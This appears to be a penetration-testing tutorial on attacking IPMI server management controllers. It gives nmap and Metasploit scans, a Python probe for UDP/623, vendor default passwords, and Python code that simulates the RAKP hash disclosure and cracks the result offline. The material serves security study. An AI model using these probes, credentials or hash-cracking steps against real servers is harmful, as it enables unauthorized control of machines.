
IPMI

What is IPMI?

  • IPMI (Intelligent Platform Management Interface) is a hardware-based management interface, implemented by a server's Baseboard Management Controller (BMC), used for monitoring and remote management of servers even when they are powered off or unresponsive.

  • It works independently of the host OS, BIOS, and CPU: the BMC has its own processor, firmware, and network interface.

  • Commonly found in Cisco, Dell (iDRAC), HP (iLO), Supermicro, and other enterprise servers.

🔹 How IPMI Works

IPMI is used for:

1️⃣ Before OS boot – Modify BIOS settings.

2️⃣ When the system is powered off – Remote control & monitoring.

3️⃣ After system failure – Debugging & recovery.

It monitors temperature, voltage, fan status, power supply, and allows remote upgrades.

🔹 Scanning for IPMI Services

Nmap Scan

IPMI's network transport (RMCP) uses UDP port 623, so the scan must be a UDP scan (-sU). The ipmi-version script sends an unauthenticated Get Channel Authentication Capabilities request and reports what the BMC answers:

```
sudo nmap -sU --script ipmi-version -p 623 <target-IP>
```

Example Output:

```
PORT    STATE SERVICE
623/udp open  asf-rmcp
| ipmi-version:
|   Version: IPMI-2.0
|   UserAuth: auth_user, non_null_user
|   PassAuth: password, md5, null
```

Version IPMI-2.0 means the BMC supports RMCP+ and therefore the RAKP key exchange; PassAuth lists the IPMI 1.5 authentication types offered (straight password, MD5, and "null", i.e. no authentication at all); UserAuth shows whether user-level authentication is enabled and whether non-null user names exist.

📌 Metasploit Scan

Metasploit has an IPMI version scanner, auxiliary/scanner/ipmi/ipmi_version, which sends the same unauthenticated probe to UDP/623 and reports the same fields for a whole RHOSTS range.
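What the nmap script and the Metasploit scanner actually send is one unauthenticated IPMI 1.5 command, Get Channel Authentication Capabilities, inside an RMCP packet. The Python below is an added example, not code from this page or from either tool: it builds that request, parses a reply, and decodes the same fields the nmap output shows. The sample reply is constructed locally; `probe()` sends the real packet over UDP/623 and is the only part that needs a target. The byte and bit layout follows the IPMI 2.0 specification; the label names (auth_user, non_null_user, per_message_auth and so on) are chosen here to mirror the nmap output and are not taken from the tools' source.

```python
import socket
import struct

# RMCP header (ASF 2.0): version 0x06, reserved, sequence 0xFF (no ACK wanted), class 0x07 = IPMI
RMCP_HEADER = bytes([0x06, 0x00, 0xFF, 0x07])

BMC_ADDR = 0x20        # responder: the BMC
CONSOLE_ADDR = 0x81    # requester: a remote console
NETFN_APP = 0x06       # Application network function (the response netFn is NETFN_APP | 1)
CMD_GET_CHANNEL_AUTH_CAPS = 0x38

# Authentication type support bits of the reply (byte 2 of the response data).
AUTH_TYPE_BITS = [(0x10, "password"), (0x04, "md5"), (0x02, "md2"), (0x20, "oem"), (0x01, "null")]


def ipmi_checksum(data: bytes) -> int:
    """IPMI two's-complement checksum: the data plus its checksum sums to zero modulo 256."""
    return (-sum(data)) & 0xFF


def wrap_ipmi15(msg: bytes) -> bytes:
    """Unauthenticated IPMI 1.5 session wrapper: auth type none, seq 0, session id 0, payload length."""
    return RMCP_HEADER + bytes([0x00]) + struct.pack("<II", 0, 0) + bytes([len(msg)]) + msg


def build_auth_caps_request(privilege: int = 0x04) -> bytes:
    """The request a remote console sends; it needs no credentials, so it doubles as a fingerprint probe."""
    header = bytes([BMC_ADDR, NETFN_APP << 2])                    # rsAddr, netFn/rsLUN
    body = bytes([CONSOLE_ADDR, 0x00, CMD_GET_CHANNEL_AUTH_CAPS,  # rqAddr, rqSeq/rqLUN, cmd
                  0x8E,                                           # bit7: ask for IPMI 2.0+ data; 0x0E: this channel
                  privilege])                                     # maximum privilege requested (4 = Administrator)
    return wrap_ipmi15(header + bytes([ipmi_checksum(header)]) + body + bytes([ipmi_checksum(body)]))


def build_auth_caps_response(auth_types: int, status: int, ext: int, channel: int = 0x01) -> bytes:
    """BMC side of the exchange; used here only to construct a sample reply for offline use."""
    header = bytes([CONSOLE_ADDR, (NETFN_APP | 1) << 2])          # rqAddr, response netFn/rqLUN
    body = bytes([BMC_ADDR, 0x00, CMD_GET_CHANNEL_AUTH_CAPS,
                  0x00,                                           # completion code: success
                  channel, auth_types, status, ext,
                  0x00, 0x00, 0x00, 0x00])                        # OEM ID and OEM auxiliary data (none)
    return wrap_ipmi15(header + bytes([ipmi_checksum(header)]) + body + bytes([ipmi_checksum(body)]))


def parse_auth_caps(packet: bytes) -> dict:
    """Decode a Get Channel Authentication Capabilities reply into the fields nmap's ipmi-version prints."""
    if packet[:4] != RMCP_HEADER or packet[4] != 0x00:
        raise ValueError("not an unauthenticated RMCP/IPMI 1.5 packet")
    msg = packet[14:14 + packet[13]]
    if ipmi_checksum(msg[:2]) != msg[2] or ipmi_checksum(msg[3:-1]) != msg[-1]:
        raise ValueError("IPMI checksum mismatch")
    if msg[5] != CMD_GET_CHANNEL_AUTH_CAPS or msg[6] != 0x00:
        raise ValueError(f"unexpected command 0x{msg[5]:02x} / completion code 0x{msg[6]:02x}")
    auth_types, status, ext = msg[8], msg[9], msg[10]
    # Response data byte 3: bits 3 and 4 are "disabled" flags (0 = enabled); bits 0-2 are "enabled" flags.
    user_auth = []
    if not status & 0x08:
        user_auth.append("auth_user")           # user-level authentication enabled
    if status & 0x04:
        user_auth.append("non_null_user")       # at least one user with a non-null name
    if status & 0x02:
        user_auth.append("null_user")           # null user names enabled
    if status & 0x01:
        user_auth.append("anonymous_user")      # anonymous login enabled
    if not status & 0x10:
        user_auth.append("per_message_auth")    # every packet authenticated, not just session setup
    # Extended capabilities byte is only meaningful when the BMC set bit 7 of the auth type byte.
    version = "IPMI-2.0" if (auth_types & 0x80 and ext & 0x02) else "IPMI-1.5"
    return {
        "version": version,
        "user_auth": user_auth,
        "pass_auth": [name for bit, name in AUTH_TYPE_BITS if auth_types & bit],
    }


def probe(host: str, port: int = 623, timeout: float = 2.0) -> dict:
    """Send the probe to a real BMC over UDP/623 (not exercised offline; the sample below is constructed)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_auth_caps_request(), (host, port))
        reply, _ = sock.recvfrom(512)
    return parse_auth_caps(reply)


# Constructed reply matching the nmap output above: IPMI 2.0; password, MD5 and none auth types;
# user-level auth enabled, non-null users present, per-message auth disabled (status byte 0x14).
SAMPLE_REPLY = build_auth_caps_response(auth_types=0x95, status=0x14, ext=0x03)

if __name__ == "__main__":
    print(parse_auth_caps(SAMPLE_REPLY))
```

A "null" entry under pass_auth means the BMC accepts IPMI 1.5 sessions with no authentication at all, and a missing per_message_auth means only session activation is authenticated; both are worth noting in a report before any credential attack starts.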

🔹 Default Credentials in IPMI

Many servers ship with default credentials that are rarely changed:

| Product | Username | Password |
| --- | --- | --- |
| Dell iDRAC | root | calvin |
| HP iLO | Administrator | Random (8 characters, printed on a tag attached to the server) |
| Supermicro | ADMIN | ADMIN |

Try the default credentials first. If they work, you have full control of the BMC, and through it of the host.

🔹 Exploiting IPMI Hash Disclosure

IPMI 2.0 session setup (RMCP+) uses the RAKP exchange. In RAKP message 2 the BMC returns an HMAC keyed with the requested user's password, computed over values the client chose or that the BMC sends in clear, before the client has proven anything. Anyone who can reach UDP/623 and supply a valid username therefore receives a salted hash of that user's password and can guess it offline, with no lockout to slow them down (CVE-2013-4786). The flaw is in the specification itself, so any BMC that implements IPMI 2.0 authentication exposes it.

📌 Dumping Hashes with Metasploit

The Metasploit module auxiliary/scanner/ipmi/ipmi_dumphashes performs the RAKP exchange for a list of usernames, records each HMAC it receives, and can write the hashes out in John and hashcat formats.

📌 Cracking IPMI Hashes with Hashcat

Hashcat cracks them as hash mode 7300 (IPMI2 RAKP HMAC-SHA1). If the target is an HP iLO still using its factory default password, a brute-force mask of eight characters drawn from uppercase letters and digits covers the default format.
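The whole chain described in this section, as an added example that is not taken from the page, from Metasploit or from hashcat: a simulated BMC answers RAKP message 1 with RAKP message 2, the attacker side rebuilds the salt and emits the salt:hash line hashcat mode 7300 consumes, and an offline guessing loop recovers the password the way hashcat would. Session IDs, nonces, the BMC GUID and the user database are constructed here; the Open Session Request/Response that precedes RAKP is not modelled and its two session IDs are passed in as parameters.

```python
import hashlib
import hmac
import os
import struct
from typing import Optional

ROLE_ADMIN = 0x04                      # requested maximum privilege: Administrator
RAKP_STATUS_OK = 0x00
RAKP_STATUS_UNAUTHORIZED_NAME = 0x0D   # RMCP+ status code: no such user name


def build_rakp1(bmc_sid: int, console_rand: bytes, role: int, username: str) -> bytes:
    """RAKP Message 1 (remote console -> BMC). It names a user but proves nothing about the password."""
    uname = username.encode()
    return (bytes([0x01, 0, 0, 0])               # message tag, reserved
            + struct.pack("<I", bmc_sid)        # BMC session ID (SIDc) learned from Open Session Response
            + console_rand                      # Rm: 16-byte console random number
            + bytes([role, 0, 0, len(uname)])   # ROLEm, reserved, user name length
            + uname)


def rakp_salt(console_sid: int, bmc_sid: int, console_rand: bytes, bmc_rand: bytes,
              bmc_guid: bytes, role: int, username: str) -> bytes:
    """Data the RAKP 2 auth code covers: SIDm || SIDc || Rm || Rc || GUIDc || ROLEm || ULengthm || UNamem.
    Every byte is either chosen by the console or sent in clear by the BMC, so the attacker has it all."""
    uname = username.encode()
    return (struct.pack("<II", console_sid, bmc_sid) + console_rand + bmc_rand + bmc_guid
            + bytes([role, len(uname)]) + uname)


def rakp_hmac(password: str, salt: bytes) -> bytes:
    """RAKP-HMAC-SHA1 key exchange auth code: HMAC-SHA1 keyed with the user's password (K_UID)."""
    return hmac.new(password.encode(), salt, hashlib.sha1).digest()


def bmc_rakp2(msg1: bytes, console_sid: int, bmc_rand: bytes, bmc_guid: bytes, users: dict) -> bytes:
    """Simulated BMC: answers RAKP 1 with RAKP 2. The auth code is keyed with the named user's password
    and is sent before the console has authenticated at all, which is the disclosure."""
    bmc_sid = struct.unpack_from("<I", msg1, 4)[0]
    console_rand = msg1[8:24]
    role, ulen = msg1[24], msg1[27]
    username = msg1[28:28 + ulen].decode()
    password = users.get(username)
    if password is None:                        # unknown user: error status and no auth code
        return bytes([0x01, RAKP_STATUS_UNAUTHORIZED_NAME, 0, 0]) + struct.pack("<I", console_sid)
    salt = rakp_salt(console_sid, bmc_sid, console_rand, bmc_rand, bmc_guid, role, username)
    return (bytes([0x01, RAKP_STATUS_OK, 0, 0])   # message tag, RMCP+ status, reserved
            + struct.pack("<I", console_sid)     # SIDm echoed back
            + bmc_rand                           # Rc
            + bmc_guid                           # GUIDc
            + rakp_hmac(password, salt))         # 20-byte key exchange authentication code


def hashcat_line(msg2: bytes, bmc_sid: int, console_rand: bytes, role: int, username: str) -> str:
    """Attacker side: rebuild the salt from RAKP 2 and emit "salt_hex:hmac_hex", the input of
    hashcat mode 7300 (the format Metasploit's ipmi_dumphashes also writes)."""
    if msg2[1] != RAKP_STATUS_OK:
        raise ValueError(f"BMC rejected RAKP 1 with status 0x{msg2[1]:02x}")
    console_sid = struct.unpack_from("<I", msg2, 4)[0]
    bmc_rand, bmc_guid, auth_code = msg2[8:24], msg2[24:40], msg2[40:60]
    salt = rakp_salt(console_sid, bmc_sid, console_rand, bmc_rand, bmc_guid, role, username)
    return salt.hex() + ":" + auth_code.hex()


def crack(line: str, candidates) -> Optional[str]:
    """Offline guessing, the job hashcat does at scale: recompute the HMAC for each candidate password."""
    salt_hex, auth_hex = line.split(":")
    salt, auth_code = bytes.fromhex(salt_hex), bytes.fromhex(auth_hex)
    for pw in candidates:
        if hmac.compare_digest(rakp_hmac(pw, salt), auth_code):
            return pw
    return None


def demo(candidates=("password", "ADMIN", "calvin")):
    """Run the exchange against a simulated BMC whose root password is the iDRAC factory default."""
    console_sid, bmc_sid = 0xA0A1A2A3, 0x00000002   # constructed session IDs from the Open Session step
    console_rand, bmc_rand = os.urandom(16), os.urandom(16)
    bmc_guid = bytes(range(16))                      # constructed BMC GUID
    msg1 = build_rakp1(bmc_sid, console_rand, ROLE_ADMIN, "root")
    msg2 = bmc_rakp2(msg1, console_sid, bmc_rand, bmc_guid, {"root": "calvin"})
    line = hashcat_line(msg2, bmc_sid, console_rand, ROLE_ADMIN, "root")
    return line, crack(line, candidates)


if __name__ == "__main__":
    line, password = demo()
    print(line)
    print("recovered password:", password)
```

The printed line can be handed to hashcat with -m 7300 as-is. The point to take away is that everything in the salt is public and only the HMAC key, the password, is secret: the BMC hands an offline-crackable hash to anyone who can name a valid user, and the only defence is a password strong enough to survive that.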

🔹 Why is IPMI Dangerous?

If an attacker gains access to IPMI credentials, they can:

  ✅ Reboot or power off servers remotely.
  ✅ Modify BIOS settings and boot custom OS images.
  ✅ Install malware or persistent backdoors.
  ✅ Perform remote code execution on the server.

